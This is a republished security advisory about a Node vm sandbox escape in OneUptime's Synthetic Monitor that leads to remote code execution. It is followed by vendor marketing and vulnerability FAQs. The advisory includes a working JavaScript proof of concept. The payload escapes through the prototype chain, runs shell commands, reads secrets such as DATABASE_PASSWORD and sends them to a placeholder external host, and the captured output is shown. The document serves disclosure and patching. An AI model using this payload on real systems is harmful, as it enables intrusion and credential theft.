OneUpTime's Unsandboxed Code Execution in Probe Allows Any Project Member to Achieve RCE
Summary
OneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js vm module. By leveraging a standard prototype-chain escape (this.constructor.constructor), an attacker can bypass the sandbox, gain access to the underlying Node.js process object, and execute arbitrary system commands (RCE) on the oneuptime-probe container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise.
Details
The root cause of the vulnerability exists in Common/Server/Utils/VM/VMRunner.ts where user-supplied JavaScript is executed using vm.runInContext():
const vmPromise = vm.runInContext(script, sandbox, { ... });
The Node.js documentation explicitly warns that the vm module is not a security boundary and should never be used to run untrusted code.
When a user creates a Synthetic Monitor, the code inputted into the Playwright script editor is passed directly to this backend function without any AST filtering or secure isolation (e.g., isolated-vm or a dedicated restricted container).
An attacker can use the payload const proc = this.constructor.constructor('return process')(); to step out of the sandbox context and grab the host's native process object. From there, they can require child_process to execute arbitrary shell commands.
Since the oneuptime-probe service runs with access to sensitive environment variables (such as ONEUPTIME_SECRET, DATABASE_PASSWORD, etc.), an attacker can trivially exfiltrate these secrets to an external server.
PoC
This exploit can be triggered entirely through the OneUptime web dashboard GUI by any user with at least "Project Member" permissions.
- Log In: Authenticate to the OneUptime Dashboard. (Open registration is enabled by default).
- Navigate: Go to Monitors > Create New Monitor.
- Monitor Type: Select Synthetic Monitor.
- Browser/Screen Settings: Ensure Chromium is selected for "Browser Types" and Desktop is selected for "Screen Size Types".
- Payload Injection: Scroll down to the "Playwright Code" editor. Delete the default template and paste the following malicious JavaScript payload:
return new Promise((resolve) => {
try {
// 1. Traverse the prototype chain to grab the host's process object
const proc = this.constructor.constructor('return process')();
// 2. Load the host's child_process module & run a system command
const cp = proc.mainModule.require('child_process');
const output = cp.execSync('ls -la /usr/src/app').toString();
// 3. (Optional) Read sensitive environment secrets
const secret = proc.env.ONEUPTIME_SECRET;
const db_pass = proc.env.DATABASE_PASSWORD;
// 4. Exfiltrate the data via the native `http` module
const http_real = proc.mainModule.require('http');
const req = http_real.request({
hostname: 'YOUR_OAST_OR_BURP_COLLABORATOR_URL_HERE',
port: 80,
path: '/',
method: 'POST'
}, (res) => {
resolve("EXFILTRATION_STATUS: " + res.statusCode);
});
req.on('error', (e) => resolve("EXFILTRATION_ERROR: " + e.message));
const payloadData = JSON.stringify({ rce_output: output, secret: secret, db: db_pass });
req.write(payloadData);
req.end();
} catch(e) {
resolve("CRITICAL_ERROR: " + e.message);
}
});
- Save & Execute: Click Save. Within 60 seconds, the probe worker will pick up the monitor, execute the code, and send the RCE output to your external listener URL.
OUTPUT:
{"rce_output":"total 296\ndrwxr-xr-x 1 root root 4096 Mar 3 18:27 .\ndrwxr-xr-x 1 root root 4096 Mar 3 18:26 ..\n-rw-r--r-- 1 root root 16 Mar 3 18:24 .gitattributes\n-rwxr-xr-x 1 root root 403 Mar 3 18:24 .gitignore\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 API\n-rw-r--r-- 1 root root 4103 Mar 3 18:24 Config.ts\n-rw-r--r-- 1 root root 2602 Mar 3 18:24 Dockerfile\n-rw-r--r-- 1 root root 2705 Mar 3 18:24 Dockerfile.tpl\n-rw-r--r-- 1 root root 2935 Mar 3 18:24 Index.ts\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Jobs\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 Services\ndrwxr-xr-x 4 root root 4096 Mar 3 18:24 Tests\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Utils\ndrwxr-xr-x 3 root root 4096 Mar 3 18:27 build\n-rw-r--r-- 1 root root 889 Mar 3 18:24 jest.config.json\ndrwxr-xr-x 297 root root 12288 Mar 3 18:26 node_modules\n-rw-r--r-- 1 root root 353 Mar 3 18:24 nodemon.json\n-rw-r--r-- 1 root root 203119 Mar 3 18:24 package-lock.json\n-rw-r--r-- 1 root root 1481 Mar 3 18:24 package.json\n-rw-r--r-- 1 root root 11514 Mar 3 18:24 tsconfig.json\n"}
<img width="1364" height="470" alt="image" src="https://github.com/user-attachments/assets/9e0d3013-bba5-4188-8777-6903c8f55dba" />
Impact
What kind of vulnerability is it? Remote Code Execution (RCE) / Code Injection / Sandbox Escape.
Who is impacted? Any OneUptime deployment running version <= 10.0.0. Since open registration is enabled by default, an external, unauthenticated attacker can create an account, create a project, and instantly compromise the entire cluster.
| Software | From | Fixed in |
|---|---|---|
@oneuptime / common
|
- | 10.0.18 |
Deep Security Visibility Without the Complexity
SynScan provides clear, real-time security insights so you can monitor your attack surface, spot risks early, and act fast—without extra complexity.
- No setup fees
- 5-min deployment
- Cancel anytime
Frequently Asked Questions
A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.
CVSS (Common Vulnerability Scoring System) estimates technical severity, but it doesn't automatically equal business risk. Prioritize using context like internet exposure, affected asset criticality, known exploitation (proof-of-concept or in-the-wild), and whether compensating controls exist. A "Medium" CVSS on an exposed, production system can be more urgent than a "Critical" on an isolated, non-production host.
A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. In practice, risk increases sharply when exploitation becomes reliable or widespread.
Recurring findings usually come from incomplete Asset Discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called Shadow IT) are a common reason the same issues resurface.
Use a simple, repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress using consistent metrics so remediation is steady, not reactive.
SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.